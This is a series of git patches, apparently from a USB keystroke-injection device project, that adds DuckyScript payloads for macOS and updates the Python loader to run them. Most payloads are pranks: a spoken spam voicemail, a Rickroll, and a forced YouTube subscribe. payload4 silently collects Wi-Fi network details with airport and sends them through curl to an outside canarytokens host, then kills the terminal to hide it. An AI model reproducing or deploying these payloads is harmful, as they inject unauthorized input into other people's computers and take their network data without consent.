From 7cfb4b2b6f5d863f131699466639b019240324e0 Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:09:13 -0700 Subject: [PATCH 1/7] Add files via upload Updated payloads to .txt instead of .dd --- payload.txt | 8 ++++++++ payload1.txt | 10 ++++++++++ payload2.txt | 9 +++++++++ payload3.txt | 13 +++++++++++++ payload4.txt | 8 ++++++++ 5 files changed, 48 insertions(+) create mode 100644 payload.txt create mode 100644 payload1.txt create mode 100644 payload2.txt create mode 100644 payload3.txt create mode 100644 payload4.txt diff --git a/payload.txt b/payload.txt new file mode 100644 index 0000000..97d71dc --- /dev/null +++ b/payload.txt @@ -0,0 +1,8 @@ +REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka +GUI SPACE +DELAY 500 +STRING terminal.app +ENTER +DELAY 1000 +STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=) +ENTER \ No newline at end of file diff --git a/payload1.txt b/payload1.txt new file mode 100644 index 0000000..44b338a --- /dev/null +++ b/payload1.txt @@ -0,0 +1,10 @@ +REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022 +DELAY 100 +GUI SPACE +DELAY 1000 +STRING textedit +ENTER +DELAY 1000 +GUI N +DELAY 100 +STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders. diff --git a/payload2.txt b/payload2.txt new file mode 100644 index 0000000..603ae5b --- /dev/null +++ b/payload2.txt @@ -0,0 +1,9 @@ +REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 1000 +STRING open "https://youtu.be/dQw4w9WgXcQ" +ENTER +DELAY 2000 +SPACE \ No newline at end of file diff --git a/payload3.txt b/payload3.txt new file mode 100644 index 0000000..cf542a6 --- /dev/null +++ b/payload3.txt @@ -0,0 +1,13 @@ +REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 1000 +STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1" +DELAY 500 +ENTER +DELAY 4000 +TAB +TAB +ENTER +ENTER \ No newline at end of file diff --git a/payload4.txt b/payload4.txt new file mode 100644 index 0000000..81219f7 --- /dev/null +++ b/payload4.txt @@ -0,0 +1,8 @@ +REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 2000 +STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=) +DELAY 500 +ENTER \ No newline at end of file From bdda10da07ce45fd04b9791d9cccbcab949640f8 Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:09:36 -0700 Subject: [PATCH 2/7] Delete payload.dd --- payload.dd | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 payload.dd diff --git a/payload.dd b/payload.dd deleted file mode 100644 index 97d71dc..0000000 --- a/payload.dd +++ /dev/null @@ -1,8 +0,0 @@ -REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka -GUI SPACE -DELAY 500 -STRING terminal.app -ENTER -DELAY 1000 -STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=) -ENTER \ No newline at end of file From 4c6f51255449add6bf0265d9f609999ddfd7859b Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:09:47 -0700 Subject: [PATCH 3/7] Delete payload1.dd --- payload1.dd | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 payload1.dd diff --git a/payload1.dd b/payload1.dd deleted file mode 100644 index 6d9045a..0000000 --- a/payload1.dd +++ /dev/null @@ -1,7 +0,0 @@ -REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022 -GUI SPACE -STRING textedit -ENTER -DELAY 1000 -CTRL N -STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders. From 363844158b9bd8adff7a231c3c9ae4a52ff8596f Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:09:59 -0700 Subject: [PATCH 4/7] Delete payload3.dd --- payload3.dd | 13 ------------- 1 file changed, 13 deletions(-) delete mode 100644 payload3.dd diff --git a/payload3.dd b/payload3.dd deleted file mode 100644 index cf542a6..0000000 --- a/payload3.dd +++ /dev/null @@ -1,13 +0,0 @@ -REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022 -GUI SPACE -STRING terminal.app -ENTER -DELAY 1000 -STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1" -DELAY 500 -ENTER -DELAY 4000 -TAB -TAB -ENTER -ENTER \ No newline at end of file From 4683a5cf8c89ccdf328620926da7441887a5517d Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:10:11 -0700 Subject: [PATCH 5/7] Delete payload4.dd --- payload4.dd | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 payload4.dd diff --git a/payload4.dd b/payload4.dd deleted file mode 100644 index 81219f7..0000000 --- a/payload4.dd +++ /dev/null @@ -1,8 +0,0 @@ -REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022 -GUI SPACE -STRING terminal.app -ENTER -DELAY 2000 -STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=) -DELAY 500 -ENTER \ No newline at end of file From d71df428fea58a8aeb8b6c8f040fbb64f671ff95 Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:10:27 -0700 Subject: [PATCH 6/7] Delete payload2.dd --- payload2.dd | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 payload2.dd diff --git a/payload2.dd b/payload2.dd deleted file mode 100644 index 603ae5b..0000000 --- a/payload2.dd +++ /dev/null @@ -1,9 +0,0 @@ -REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022 -GUI SPACE -STRING terminal.app -ENTER -DELAY 1000 -STRING open "https://youtu.be/dQw4w9WgXcQ" -ENTER -DELAY 2000 -SPACE \ No newline at end of file From 44257ed5493fe7f19de6650479e1f99c712f60c7 Mon Sep 17 00:00:00 2001 From: Skickar <40251293+skickar@users.noreply.github.com> Date: Sat, 19 Mar 2022 04:11:38 -0700 Subject: [PATCH 7/7] Updated to use .txt payloads switched from .dd to .txt duckyscript payloads for easier editing --- code.py | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/code.py b/code.py index 227b21e..ae4fb22 100644 --- a/code.py +++ b/code.py @@ -2,7 +2,7 @@ # copyright (c) 2021 Dave Bailey # Author: Dave Bailey (dbisu, @daveisu) # Nugget Fork: Kody Kinzie @skickar -# Now It Runs One Of 4 Payloads! +# Now It Runs One Of 5 Payloads! import usb_hid from adafruit_hid.keyboard import Keyboard @@ -119,7 +119,7 @@ def parseLine(line): def injectPayload(payloadNumber): f = open(duckyScriptPath[payloadNumber],"r",encoding='utf-8') - print("Running payload.dd") + print("Running payload.txt") previousLine = "" duckyScript = f.readlines() for line in duckyScript: @@ -138,7 +138,7 @@ def injectPayload(payloadNumber): kbd = Keyboard(usb_hid.devices) layout = KeyboardLayout(kbd) -duckyScriptPath = ["payload1.dd", "payload2.dd", "payload3.dd", "payload4.dd", "payload.dd"] +duckyScriptPath = ["payload1.txt", "payload2.txt", "payload3.txt", "payload4.txt", "payload.txt"] # sleep at the start to allow the device to be recognized by the host computer time.sleep(.5) @@ -153,7 +153,7 @@ print(progStatus) if(progStatus == True): # not in setup mode, inject the payload - print("Attack Mode: Running payload.dd") + print("Attack Mode: Running payload.txt") injectPayload(4) print("Done") else: @@ -168,4 +168,3 @@ while True: injectPayload(i) if buttons[i].rose: print("button",i,"released!") -